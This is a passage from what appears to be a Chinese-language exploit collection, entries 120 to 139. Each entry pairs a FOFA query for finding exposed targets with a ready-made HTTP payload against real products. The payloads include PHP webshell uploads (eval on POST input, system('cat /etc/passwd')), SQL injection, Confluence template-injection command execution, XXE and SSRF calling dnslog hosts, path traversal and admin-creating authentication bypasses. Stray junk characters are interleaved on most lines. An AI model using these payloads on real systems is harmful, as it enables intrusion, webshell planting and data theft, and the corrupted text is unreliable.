src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456/ s( u R6 O( Z7 E# k. K# t
5 M+ c$ O6 A" ]7 H) K7 X3 b$ I( X2 C$ d, G% s w# ~. F
120. 北京百绰智能S40管理平台导入web.php任意文件上传% l8 U- H6 L0 j. _1 {! c! |" n
CVE-2024-1253
- a/ O: r r2 R6 @) T0 XFOFA:title="Smart管理平台"7 d# ^0 w' V9 N
POST /useratte/web.php? HTTP/1.18 F `9 l8 Q( }2 b4 |# o
Host: ip:port
8 S6 U7 N5 G( B* p# aCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
3 H+ W4 k4 k1 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko$ C& _. L0 u% p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' \3 O# x$ U8 t' Y- uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* x) W1 Y A) \9 g: F3 d
Accept-Encoding: gzip, deflate
3 L c" S9 C1 |' s% x7 w3 pContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
5 S9 f. S2 V) a8 o" LContent-Length: 597
8 T3 n3 s5 m! b* `3 _6 ^2 jOrigin: https://ip:port
. ~0 Z% x/ L+ l- s: e6 X4 r1 RReferer: https://ip:port/sysmanage/licence.php
5 i3 t4 |9 R: Q- PUpgrade-Insecure-Requests: 1" R* _# B! j" k2 V
Sec-Fetch-Dest: document8 n5 f/ ~9 ]9 Y
Sec-Fetch-Mode: navigate& G( D1 E$ R n$ P$ D# y: N
Sec-Fetch-Site: same-origin5 P* \* {3 W8 U
Sec-Fetch-User: ?1
7 O9 q/ D, I6 ~1 M" ~7 U& _Te: trailers
; }5 M) U/ q" l% j1 b5 u; w$ SConnection: close
0 }- P9 M4 ~9 w k$ _' g4 X! \& z. K; D. L0 t9 A4 w, n7 C
-----------------------------42328904123665875270630079328" J, W0 i( o# y- T1 n
Content-Disposition: form-data; name="file_upload"; filename="2.php"0 b1 P, d0 ^4 E) w# {
Content-Type: application/octet-stream+ q2 q- X2 E( ?$ `: x4 K3 n J
/ D6 d5 S# {. n' L H& L<?php phpinfo()?>& q9 b& @9 u& X' l2 n$ H
-----------------------------42328904123665875270630079328
( }4 N% r, J5 F6 W7 kContent-Disposition: form-data; name="id_type"
# {& B/ m6 c& _ j8 T
5 T* J' f6 w# r$ z" {( I1
6 A' u2 [9 [) P2 E; g. c-----------------------------423289041236658752706300793285 i9 F+ T- p$ ]2 D
Content-Disposition: form-data; name="1_ck"+ X3 ^2 Q$ k/ O" e" P( p+ w
6 ]4 o/ j% m2 {7 n" b$ S1_radhttp- D; |$ { V. W9 J9 ~
-----------------------------42328904123665875270630079328
7 B0 W/ D& @8 i0 [' j9 V, lContent-Disposition: form-data; name="mode"! _& r+ D3 |; U+ P
3 A) p$ I1 L% \# j
import ]0 y% z" b6 H. k; Y | G
-----------------------------42328904123665875270630079328
# j6 Z) }$ b' w/ X' B2 K' u. l& `( }& ^. I8 O4 S3 w
. K ^0 K7 o1 i% j2 l2 Y5 o# _' S
文件路径/upload/2.php. b9 _5 i3 Q- [+ |) H( }$ R+ a
" H/ a: O9 o7 Z8 v2 V/ d
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
e1 K4 r3 o5 V9 U1 X2 N4 M0 V" F( kCVE-2024-19181 y: X$ O* n; g
FOFA:title="Smart管理平台") L" c4 w" T( D7 {( j( [7 ? o* I
POST /useratte/userattestation.php HTTP/1.1
* G/ e% `: R3 {; K2 \" R: wHost: 192.168.40.130:8443
3 o1 H& w, M+ l7 z1 x% C: _Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50+ e6 R8 @3 J5 F H) [' [/ J
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
' q* ~% C2 Z; S! V$ r% nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 {* `5 {" ]; ?2 I& m3 x/ @* _/ I; EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 R$ X9 y$ j x
Accept-Encoding: gzip, deflate2 w5 n' _0 Z7 X9 t) b
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
7 D8 Z9 x( Q+ |1 zContent-Length: 5920 z$ b A+ D# e Y! l
Origin: https://192.168.40.130:8443$ Q0 [4 ]! U- o" C
Upgrade-Insecure-Requests: 1# }8 X: j! f* W1 ]2 F: Z
Sec-Fetch-Dest: document, Y4 Q. Y5 K/ F
Sec-Fetch-Mode: navigate6 S( u s- U4 w5 K
Sec-Fetch-Site: same-origin* I3 v3 b" Z* c) D
Sec-Fetch-User: ?1) S- V! [3 C% V8 p6 M3 r1 w& T
Te: trailers( v' M' J5 K# A
Connection: close
. U7 M8 h' Z, M# Y# j2 v# p
9 {* `; H- R3 e5 s4 I% k e. h-----------------------------42328904123665875270630079328
# |2 b; p9 p6 E; d( [/ xContent-Disposition: form-data; name="web_img"; filename="1.php"
$ K5 d: `! c0 D8 f, mContent-Type: application/octet-stream* o+ i9 f; R0 X" }8 m
; Z6 K- w5 f6 [( R3 ?1 Z4 v8 D<?php phpinfo();?>
2 _' t0 n/ X+ o-----------------------------42328904123665875270630079328
+ ^7 @, M S7 y- s1 I9 V$ tContent-Disposition: form-data; name="id_type"
) L/ N5 S( t* s. H' Y+ H8 g. {* _6 Z! g, p0 X$ f4 M: U) E6 N' X2 D, A/ @, j
1
m5 H/ `7 V/ F( \7 H-----------------------------42328904123665875270630079328
% B% T+ `2 q9 x T# ^+ AContent-Disposition: form-data; name="1_ck") W0 k) e' r3 ~" L
7 [; p$ W3 h8 h7 m8 w0 b. F
1_radhttp
8 |* E( v$ X' B0 G-----------------------------42328904123665875270630079328* k/ v. e- Y9 x# _
Content-Disposition: form-data; name="hidwel"0 c7 v- h, z" Y3 P1 K# _/ _& Z Q
( g; n: ~/ o: K. b, s" F
set
% p9 @. x1 }# g! L8 K, h0 H3 E/ o7 t9 A-----------------------------423289041236658752706300793280 A7 f0 p, R1 O- P+ \' P
* K. \9 T7 B/ C0 Z5 X
s/ r- j i" A% \# x+ k, R, b
boot/web/upload/weblogo/1.php
/ q. I' i/ {1 V) K4 t$ P3 B' d8 N. M5 Z
122. 北京百绰智能s200管理平台/importexport.php sql注入
9 S2 n2 w7 N% g; H+ D+ R+ V7 @CVE-2024-27718FOFA:title="Smart管理平台" X; @3 {7 z! R- p& k7 v; O
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()* _. T# ]( a- w
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1) J6 n, Y* q8 R8 d6 v* ^0 v- e
Host: x.x.x.x
9 Y0 c: m/ ?8 D2 M+ t' g: }5 ]5 fCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc09 J: C9 w# d4 J/ J7 W$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 r" w# K+ k$ ?8 q9 b- R8 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 a5 q0 r0 O3 V) }$ A1 M0 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 L9 S" J0 g+ a3 o7 j H
Accept-Encoding: gzip, deflate, br
, o& `) F: x9 DUpgrade-Insecure-Requests: 1
% E4 g' S6 D3 w$ ?: mSec-Fetch-Dest: document
4 Q V+ D. ^ Q- B- F t \6 FSec-Fetch-Mode: navigate
5 R4 Y% ?2 m. l* cSec-Fetch-Site: none
5 H4 g7 o' Z1 T$ [. P2 B* d$ n& uSec-Fetch-User: ?1" ~$ Q4 }/ ?0 r5 s! G% b( i. ~ W
Te: trailers
, C/ a0 B& J, F% n$ k% dConnection: close7 B1 t. L) X1 j2 E) ^
2 S5 |/ Y: N" D8 h }
) g1 X. a x) `7 N0 H- G/ L
123. Atlassian Confluence 模板注入代码执行/ A6 r1 @ V/ j, Y4 q
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
; V# u/ J7 T+ @0 EPOST /template/aui/text-inline.vm HTTP/1.17 g2 e# Q d( e, i' S' Y
Host: localhost:8090( |1 m N2 \ T& K- U% m
Accept-Encoding: gzip, deflate, br
- k: p( Y2 y0 E# Q. B" L5 l7 QAccept: */*# ^! n* [4 L3 e3 b) S: t [
Accept-Language: en-US;q=0.9,en;q=0.8
5 j4 [! u p) R" \4 k. ^0 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
* m6 o) j( b' O7 H; w1 j' k5 {Connection: close
2 h% w' s. U) @9 e9 |Content-Type: application/x-www-form-urlencoded
/ r! t1 n e' T( X$ s: K2 L" x* \7 j" I7 X! C& J
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))5 Z6 o( _* b5 K1 i% G9 f; X
t* l( s$ Q, z% E, I) H! p ~8 b# O, X$ f# l% \
124. 湖南建研工程质量检测系统任意文件上传% o# Q+ J. f5 X1 g7 X6 f2 i# c% c
FOFA:body="/Content/Theme/Standard/webSite/login.css"
0 C* ?: z/ U+ s' LPOST /Scripts/admintool?type=updatefile HTTP/1.1& _# b5 i4 j y, {
Host: 192.168.40.130:8282
! i# l K9 n, u' N3 _' P# EUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.364 q& S' a- D4 x7 [7 l/ `
Content-Length: 72
. E* C" m& O+ J |, F1 t oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.85 Q1 j1 x3 a; T% _
Accept-Encoding: gzip, deflate, br2 J6 Y: q# t7 }. w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! c' N6 F9 Y: _ X1 eConnection: close
; t1 |" x- L! zContent-Type: application/x-www-form-urlencoded+ z6 I: Z z/ @5 C
0 b+ z9 E* W7 x! w
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
( E$ D6 d9 h5 i0 a: k) U2 U _) s$ p& t1 O. |8 w3 |
* z$ z; N* `8 H. Y; `) z8 mhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
, d5 c2 Z. L( K5 T6 D
. L% F. a. X& z3 t# O5 p) x125. ConnectWise ScreenConnect身份验证绕过
: b# t* h& T7 f4 }" ECVE-2024-1709
& o# Q! f7 z0 B, s4 VFOFA:icon_hash="-82958153"5 K1 }3 J' A6 l2 H4 t! A
https://github.com/watchtowrlabs ... bypass-add-user-poc: C: E3 K1 ]; b: {
) q7 W) P) T' ^+ t3 l8 W! K3 F: p
, n4 K2 \9 C: Y% S3 l- Y% H( L使用方法/ \& f3 C5 S& q! Q. Q }9 ^
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!# b# K/ s. A6 V2 j& B& U; K \; }
, a2 c' j( a6 S7 y" s3 b
, z6 |3 E3 Z% s3 \; a
创建好用户后直接登录后台,可以执行系统命令。% L; m0 j8 y# A: T; Q* f2 W- \
( n+ e* G e% s1 U. }3 f9 R
126. Aiohttp 路径遍历& |! w0 L" L# K( n( }5 ] z- m3 S
FOFA:title=="ComfyUI": L3 }1 S% G' }7 d4 a
GET /static/../../../../../etc/passwd HTTP/1.1- D- F! h- y$ `
Host: x.x.x.x
# C2 ]9 M, ^/ z4 `( ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 x4 ]( p0 ~/ A0 E. u
Connection: close1 W/ ~1 i1 o2 ` ]
Accept: */*; ` n" S7 C+ O# M
Accept-Language: en. l$ r; h" F% z# C
Accept-Encoding: gzip
* n5 @( W& y2 s* u% B
; z- }/ E& j$ N' g3 A0 T0 V. K# z- l
127. 广联达Linkworks DataExchange.ashx XXE( N+ t. B9 Z9 m& \7 J" |- y+ \
FOFA:body="Services/Identification/login.ashx" * K6 s9 W: K& e) X6 _
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1! X# s9 u. _& X
Host: 192.168.40.130:8888
# j% P7 `0 L6 l0 n2 ^. YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.362 P- m1 H, D& H* G
Content-Length: 4153 Z/ r6 I# T8 |8 Y% C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ ^' c4 ^2 w7 pAccept-Encoding: gzip, deflate
4 M8 z- S" g1 pAccept-Language: zh-CN,zh;q=0.9
3 L; n+ |% \! p6 c2 O+ PConnection: close
. }4 F1 ^/ Q) I/ q! g+ U1 fContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0; B& [+ }& X# T* t9 f
Purpose: prefetch
0 `3 ^/ l. d% V. c1 h* ?9 iSec-Purpose: prefetch;prerender
4 M& d" v( Q( W% C$ n- z! Z$ q; q1 i: V. g+ h+ d% v& T
------WebKitFormBoundaryJGgV5l5ta05yAIe0
3 N3 o/ V/ X0 `6 LContent-Disposition: form-data;name="SystemName"7 m- p- | T a" \5 b
0 G, U5 X: W2 b% W
BIM
( f8 d X+ k* k8 S. \------WebKitFormBoundaryJGgV5l5ta05yAIe0- Y1 N# S. Z- B6 k
Content-Disposition: form-data;name="Params"
2 h: o" N; ^4 C2 K( `6 pContent-Type: text/plain
$ l0 _5 M; l$ }! h& d
; ?1 A6 b% L( H, M5 C5 y( t8 m<?xml version="1.0" encoding="UTF-8"?>
2 V6 w, W0 v0 N<!DOCTYPE test [" e2 ]8 _1 _* z
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
8 D0 R9 L6 {6 R; Z' V]
+ J. T0 o/ O8 O" K>
- \: a2 T3 g5 b; P! F+ |/ p4 {<test>&t;</test>
8 h8 \$ |: H! s6 Q1 Q% u8 j8 {------WebKitFormBoundaryJGgV5l5ta05yAIe0--
9 }: C- C" n e% q$ G- P$ N1 r3 D" K6 d/ d+ N
! n( i- p( q* q1 P0 A U9 Q& |$ C# D! E0 [
128. Adobe ColdFusion 反序列化- e8 D9 u0 q" ] Q, w" y
CVE-2023-38203( p- \. j! Y; E0 S" ~4 x& }
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). D. K ?* U: g
FOFA:app="Adobe-ColdFusion"
. e9 W h$ t& `6 l# BPAYLOAD
: K8 x+ n: B( F7 E1 u% Y7 i% S
! F" s0 _ u9 ~6 h/ y* G6 t129. Adobe ColdFusion 任意文件读取* n' Y) }. g, O+ A- p
CVE-2024-20767/ M9 q: V2 U; [: s1 M1 \/ l
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"/ j$ X; E0 A2 D0 h: G
第一步,获取uuid
' @8 i* x8 r+ p. [1 g' t( hGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% I0 f# i# g: F# [/ e- l0 V I( k
Host: x.x.x.x$ [7 g) g1 F/ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' X- I" O. @9 ]& `
Accept: */*) v* p" V' `) f% a
Accept-Encoding: gzip, deflate
! o- Z' U! j3 Q" R; ] f JConnection: close
/ E8 v' X- |. V3 I
8 {. F; S3 G2 s& n R0 p9 Q9 V8 V# O. W3 z# a
第二步,读取/etc/passwd文件
7 i, p) H" W0 S3 }4 vGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
) Y, O( i8 O% Q2 ^* |* H' g0 ? z- FHost: x.x.x.x; n- O U7 k' s: @8 r5 E, j; H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# z1 k6 A; B' u5 e3 {/ a4 }7 u
Accept: */*
& \. T7 `& }3 F1 a! K+ X9 bAccept-Encoding: gzip, deflate" }1 Y. p8 z% R/ j! r) C
Connection: close5 \+ N3 I( z% b
uuid: 85f60018-a654-4410-a783-f81cbd5000b96 x( h! \; K3 w5 @! ^% Y, c
4 @" d- R3 b( ~2 V4 \: a9 h( w; x7 B/ ^! U0 |1 g. H
130. Laykefu客服系统任意文件上传
# |" c5 w8 m+ J* N8 A$ n: rFOFA:icon_hash="-334624619"
U* v0 p& ] K$ WPOST /admin/users/upavatar.html HTTP/1.19 F, x* _7 A( M& A; ~0 V
Host: 127.0.0.1
9 \, `& G5 t3 t/ J. B, l1 SAccept: application/json, text/javascript, */*; q=0.01
1 \. ~: u) ?/ C" ]: g/ Q4 f* gX-Requested-With: XMLHttpRequest) J$ @3 D3 Q q% i, C3 M
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
8 m& Y; e" L$ f' A; BContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
% e7 H- o6 Q8 `: lAccept-Encoding: gzip, deflate
, A4 a6 O/ `* l3 a: a7 j% j$ KAccept-Language: zh-CN,zh;q=0.9$ Q2 j" b* t- F( T5 [
Cookie: user_name=1; user_id=3
) ^6 Q* u( b* \" A0 v6 j5 W0 LConnection: close0 S) p& |$ k% i1 L2 H7 c6 |: @2 Y% N: t
7 ]; L( }6 p Q( z, W
------WebKitFormBoundary3OCVBiwBVsNuB2kR9 `+ y" }1 E9 |. {) H7 e
Content-Disposition: form-data; name="file"; filename="1.php"
" m7 w8 ~3 u1 ]/ I" jContent-Type: image/png
( S1 B8 X% c$ y7 J" a! b
* d4 X. d9 n' Q0 Y& A1 K6 h<?php phpinfo();@eval($_POST['sec']);?>
) U* f$ i7 R2 M------WebKitFormBoundary3OCVBiwBVsNuB2kR--
" a5 \0 k% Z6 E" W1 x# s6 Q* j' ]8 }2 p) R. l
# j! R& X2 p0 B l E: H
131. Mini-Tmall <=20231017 SQL注入8 e7 b1 f# H' n2 N
FOFA:icon_hash="-2087517259"
! b" m( g) g3 Z后台地址:http://localhost:8080/tmall/admin
( V& f& b' ]$ }6 K; X1 Vhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)* ^/ R6 F1 Z$ Y2 O
! c) A& }/ \0 a132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过2 S: R; C# X; W9 @+ P
CVE-2024-27198, ^* u( B0 k% U6 H- C! {& C
FOFA:body="Log in to TeamCity"* d; m1 I& e/ Z
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.15 J4 m0 d0 Z+ u( _& w1 g
Host: 192.168.40.130:8111" ^! o8 h5 L/ u4 f% e r. p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- B3 h \; c" W, t& V) K
Accept: */*
; y1 u# }5 e' Y7 P9 t9 `Content-Type: application/json( Q# |- P. m" g# Y7 l n8 q4 A
Accept-Encoding: gzip, deflate
' R; F2 ]/ h1 T" O
3 y K6 e* N2 u. Q$ K( m( U; c{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}' O) A a3 U7 C$ x6 D# I
8 C& i; p4 w2 P" {# f. V1 d% z* d0 ?" @$ g+ v2 O% i
CVE-2024-271993 t [, Q2 e2 n6 u
/res/../admin/diagnostic.jsp' `& C6 K% r7 s+ k) n- m( d7 X, ^
/.well-known/acme-challenge/../../admin/diagnostic.jsp3 ~7 g4 ~& Q8 _. Q
/update/../admin/diagnostic.jsp* V, u+ b- H" \; \
' Q0 X1 M7 j. A, u `" f$ o% Y
CVE-2024-27198-RCE.py. z. F3 M, T7 t9 p% E
) ~2 r3 H5 @2 P133. H5 云商城 file.php 文件上传
' |4 B( q3 H4 f" J$ w1 ]* LFOFA:body="/public/qbsp.php", e# Y) C8 V- i
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
& o4 h6 b( e v9 Z, [7 e# cHost: your-ip: g5 Z% M4 E" h, L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- v0 V" X% [* A+ K3 K7 L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
+ Y/ O" d6 b* h; u2 B8 `/ |! {
3 y& q5 `5 F/ z1 f------WebKitFormBoundaryFQqYtrIWb8iBxUCx
# ?) M$ f7 e& CContent-Disposition: form-data; name="file"; filename="rce.php"
' `6 G& \, o, R- wContent-Type: application/octet-stream8 J; T# p8 |) y, M$ T
9 S, j2 z! W( J/ }5 s5 C" V- f<?php system("cat /etc/passwd");unlink(__FILE__);?>. a" U+ i1 p# O% {
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
" p+ {+ X2 Q7 w4 M# p, c
9 J( U7 }" V6 N4 F3 U0 c
( f5 N1 `/ n3 M' k
; r2 `/ H. b5 p. b# E6 P134. 网康NS-ASG应用安全网关index.php sql注入" p% Z; K/ y' {# t
CVE-2024-2330* l( V" z' J2 y [
Netentsec NS-ASG Application Security Gateway 6.3版本
6 @8 h# L x( [% C2 LFOFA:app="网康科技-NS-ASG安全网关"
) i- w0 B: _; U9 P1 C/ gPOST /protocol/index.php HTTP/1.1, J- h8 Z% ]+ K+ ]. Q! g
Host: x.x.x.x% K/ Q, @8 S2 c4 C; F- Q
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
& F! B( G$ f. D3 j3 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! `! f: Q* J7 s, }% A$ c
Accept: */*
* Y x. G9 [. q' oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: _% D0 J( r& l4 L0 a9 TAccept-Encoding: gzip, deflate/ W0 `# m! v! o9 i) o* e
Sec-Fetch-Dest: empty
) @. `% W1 I: ?/ l( I6 c% o' ySec-Fetch-Mode: cors
; V- X* g, @' ~. jSec-Fetch-Site: same-origin1 ?0 I+ ]4 q. h$ O' L
Te: trailers
+ [2 P2 d# Q0 |& U: UConnection: close' g+ ]' E ]9 P) D$ b, u
Content-Type: application/x-www-form-urlencoded$ j# H1 e$ ?6 R
Content-Length: 263
& v. Q' ]1 ?' X
( r$ b6 B* Y. z5 k) o& kjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}2 J M' ? h& r0 r$ U
: [7 j) X1 I# t: i: e m
: a7 p# G" |) @+ u: G135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
. k) l3 T- X+ ~4 fCVE-2024-2022# O, [2 `7 E) D0 C9 d% G
Netentsec NS-ASG Application Security Gateway 6.3版本
. F e9 G5 b/ @& s6 {* hFOFA:app="网康科技-NS-ASG安全网关"
3 K7 q- ^5 V, a' e+ hGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
, o, V+ A- _5 J* j- d5 o) xHost: x.x.x.x
" I4 t" Q0 x/ V: Z' ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; f* u; I( \( J9 q4 {0 ]/ g& HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' ?0 c4 [- i( X9 B: YAccept-Encoding: gzip, deflate
- s: h9 f4 h& W4 ~Accept-Language: zh-CN,zh;q=0.9
/ {. j- X4 T, s5 t& o! \Connection: close
A% P( L6 W' Y
3 A2 K G9 K( Z, g# @/ _+ b2 u* W- X9 T
136. NextChat cors SSRF
0 ~" q* t1 q4 a# `2 J9 O: D7 MCVE-2023-49785" f7 C( T$ K8 |" M" w( Y T5 v" v$ w
FOFA:title="NextChat"
1 e7 G/ r- m; z. T+ aGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.14 c. H8 |8 ~4 q/ I
Host: x.x.x.x:10000
0 w" N) m% U0 G, {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 M7 N. ~; \# o, D' m) oConnection: close0 }& {1 A- }( d# Y1 C9 m0 U
Accept: */*
5 U: K5 B* I7 C; J% g1 I0 CAccept-Language: en
; e+ {8 X! f% _$ PAccept-Encoding: gzip
8 {' y& G- ?0 I% w9 A! D7 r( v
4 _, \! h, m5 x6 {& E. [# K$ q- m+ ~8 x) b( _) _: g$ `
137. 福建科立迅通信指挥调度平台down_file.php sql注入( X: T" L& `$ C9 R( r- x
CVE-2024-2620
& D( r, x3 v- \, dFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"7 b$ d/ S+ t4 ?" s. j: r* V
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.18 l, C& t3 e# E4 y, c
Host: x.x.x.x
. K- f" D- Q M( R; OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" C7 [! \ y4 I0 }6 k# _$ I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 ~- p2 L+ m6 x9 {% Z& j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! P: ^& x* Y. \% i& PAccept-Encoding: gzip, deflate, br2 ?4 k7 Z2 Z9 Q) \( k( G
Connection: close
' R9 o. |9 }! i% K8 t% w! ZCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj! ~2 Q3 ?1 y, k6 U
Upgrade-Insecure-Requests: 1
7 i: P6 f6 u3 C' ]; b% H( @: J) N4 {& z
7 l6 P1 } i: N8 |$ i( D138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
, p1 Y7 S/ i4 O/ CCVE-2024-2621
9 L2 x5 O- n% I CFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( @. m% e9 w$ x1 M3 x1 Y. oGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.13 }+ l' Q2 R o+ l# o1 ?7 n7 c: Y( E
Host: x.x.x.x
6 I8 H) t% s! N' U6 x# YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# \, L1 `( I4 W, `5 W q* `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" @ O. w! o3 Y3 z1 H( pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: I' b, @- T. |2 D$ A7 {1 Y0 e0 BAccept-Encoding: gzip, deflate, br
. ` {' C7 n/ b' s, ~; |/ \Connection: close
* E/ y+ t7 J8 d! M- U KUpgrade-Insecure-Requests: 1
% b; t* K. N( X" @/ ^: o! F7 {8 J& L
. m6 W* q& y' y& `2 R2 C139. 福建科立讯通信指挥调度平台editemedia.php sql注入; {8 u4 H( L8 T U5 s
CVE-2024-2622$ K: G/ S8 `" y; u
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" F% q1 J3 }: ~9 z8 S9 YGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
- H, q" m7 m+ x( g5 S& qHost: x.x.x.x
2 C! ~9 v# X7 N: m8 ?7 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
